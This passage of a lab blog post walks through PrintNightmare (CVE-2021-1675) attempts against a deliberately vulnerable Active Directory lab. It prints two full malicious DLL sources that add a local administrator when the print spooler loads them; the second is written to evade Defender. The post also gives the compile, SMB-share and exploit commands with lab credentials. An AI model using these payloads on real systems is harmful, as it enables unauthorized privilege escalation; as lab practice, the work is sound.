└─# impacket-rpcdump @192.168.10.12 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

Prepare the malicious nightmare.c.

#include <windows.h>
#include <stdlib.h>   /* system() */

/* Payload: runs once when the spooler loads the DLL and creates a local admin. */
int RunCMD()
{
    system("net users pnightmare Passw0rd123. /add");
    system("net localgroup administrators pnightmare /add");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:   /* DLL loaded into spoolsv.exe, which runs as SYSTEM */
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Compile it into a DLL.

Note that this bug is only usable against the older Windows Server 2016 DC, i.e. Meereen.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# vim nightmare.c

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c

Set up an SMB share that hosts the malicious DLL

┌──(root㉿kaada)-[/opt/printnightmare]
└─# ls
CVE-2021-1675.py Images nightmare.dll README.md SharpPrintNightmare

┌──(root㉿kaada)-[/opt/printnightmare]
└─# impacket-smbserver -smb2support ATTACKERSHARE .
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Launch the attack; it fails with ERROR_BAD_NETPATH, meaning the spooler on Meereen could not open the UNC path to the attacker's share.

┌──(root㉿kaada)-[/opt/printnightmare]
└─# python CVE-2021-1675.py essos.local/jorah.mormont:'H0nnor!'@meereen.essos.local '\\192.168.10.150\ATTACKERSHARE\nightmare.dll'
[*] Connecting to ncacn_np:meereen.essos.local[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.10.150\ATTACKERSHARE\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
File "/opt/printnightmare/CVE-2021-1675.py", line 188, in <module>
main(dce, pDriverPath, options.share)
~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/printnightmare/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rprn.py", line 657, in hRpcAddPrinterDriverEx
return dce.request(request)
~~~~~~~~~~~^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1436, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.

Tried disabling the firewall, but that crashed the target's service.

Dead end.

  • Worth knowing: after a few failed attempts the Spooler service gets stopped by Defender, and the bug cannot be exploited again until someone restarts the server or the Spooler service.

So the only option left is to try Winterfell. Winterfell runs Windows Defender, though, so a different malicious DLL is needed, one that calls the NetUserAdd API directly instead of spawning net.exe.

/*
 * ADDUSER.C: creating a Windows user programmatically.
 *
 * Builds as a DLL (for the PrintNightmare driver load), as a rundll32 target
 * (exported CreateAdminUser) or as a console program (main). It uses the
 * NetUserAdd / NetLocalGroupAddMembers APIs directly instead of spawning net.exe
 * as the first DLL did. Link against netapi32, e.g.:
 *   x86_64-w64-mingw32-gcc -shared -o pnightmare2.dll ADDUSER.C -lnetapi32
 */

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <stdio.h>      /* _tprintf */
#include <string.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <tchar.h>

DWORD CreateAdminUserInternal(void)
{
    NET_API_STATUS rc;
    BOOL b;
    DWORD dw;

    USER_INFO_1 ud;
    LOCALGROUP_MEMBERS_INFO_0 gd;
    SID_NAME_USE snu;

    DWORD cbSid = 256; // 256 bytes should be enough for everybody :)
    BYTE Sid[256];

    DWORD cbDomain = 256 / sizeof(TCHAR);
    TCHAR Domain[256];

    // Create user
    memset(&ud, 0, sizeof(ud));

    ud.usri1_name = _T("pnightmare2");              // username
    ud.usri1_password = _T("Test123456789!");       // password
    ud.usri1_priv = USER_PRIV_USER;                 // cannot set USER_PRIV_ADMIN on creation
    ud.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT; // must be set
    ud.usri1_script_path = NULL;

    rc = NetUserAdd(
        NULL,        // local server
        1,           // information level
        (LPBYTE)&ud,
        NULL         // error value
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

    _tprintf(_T("NetUserAdd OK\r\n"));

    // Get user SID
    b = LookupAccountName(
        NULL,           // local server
        ud.usri1_name,  // account name
        Sid,            // SID
        &cbSid,         // SID size
        Domain,         // Domain
        &cbDomain,      // Domain size
        &snu            // SID_NAME_USE (enum)
    );

    if (!b) {
        dw = GetLastError();
        _tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
        return dw;
    }

    // Add user to "Administrators" local group
    memset(&gd, 0, sizeof(gd));

    gd.lgrmi0_sid = (PSID)Sid;

    rc = NetLocalGroupAddMembers(
        NULL,                   // local server
        _T("Administrators"),
        0,                      // information level
        (LPBYTE)&gd,
        1                       // only one entry
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

    return 0;
}

//
// DLL entry point.
//

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateAdminUserInternal();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// RUNDLL32 entry point
#ifdef __cplusplus
extern "C" {
#endif

__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    CreateAdminUserInternal();
}

#ifdef __cplusplus
}
#endif

// Command-line entry point.
int main()
{
    return CreateAdminUserInternal();
}

┌──(root㉿kaada)-[/opt/printnightmare]
└─# python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@winterfell.north.sevenkingdoms.local '\\192.168.10.150\ATTACKERSHARE\pnightmare2.dll'
[*] Connecting to ncacn_np:winterfell.north.sevenkingdoms.local[\PIPE\spoolss]
[-] Connection Failed

┌──(root㉿kaada)-[/opt/printnightmare]
└─# ls
ADDUSER.C CVE-2021-1675.py Images nightmare.dll pnightmare2.dll README.md SharpPrintNightmare

Brilliant.

┌──(root㉿kaada)-[/opt/printnightmare]
└─# smbclient //192.168.10.11/Users -U 'north.sevenkingdoms.local/jon.snow%iknownothing' -c 'put pnightmare2.dll Public\pnightmare2.dll'
do_connect: Connection to 192.168.10.11 failed (Error NT_STATUS_IO_TIMEOUT)
┌──(root㉿kaada)-[/opt/printnightmare]
└─# ping 192.168.10.11
PING 192.168.10.11 (192.168.10.11) 56(84) bytes of data.
^C
--- 192.168.10.11 ping statistics ---
90 packets transmitted, 0 received, 100% packet loss, time 91193ms


Oh well, forget it; it is enough to know that this exists.

Next we test attacks against a domain with ADCS set up. First we use unauthenticated PetitPotam and ESC8 to become domain admin on essos.local; then we enumerate certificate templates with certipy, BloodHound and a user account. Finally we work through the following: certipy, ESC1, ESC2, ESC3, ESC4, ESC6, Certifried and Shadow Credentials.

ESC8 - coerce to domain admin

  • For this attack to work, we need:
    • ADCS running in the domain with Web Enrollment enabled.
    • A working coercion method (here unauthenticated PetitPotam; an authenticated PrinterBug or any other coercion method works just as well).
    • A template usable for ESC8; by default in Active Directory it is named DomainController.

The lab's services crashed for good, so I rebuilt it from scratch. The IPs may change from here on.


Starting GOAD Life from Zero (Part 2)
http://example.com/2026/02/02/从零开始的GOAD生活-中/
Author: Skyarrow
Posted on: February 2, 2026
Licensed under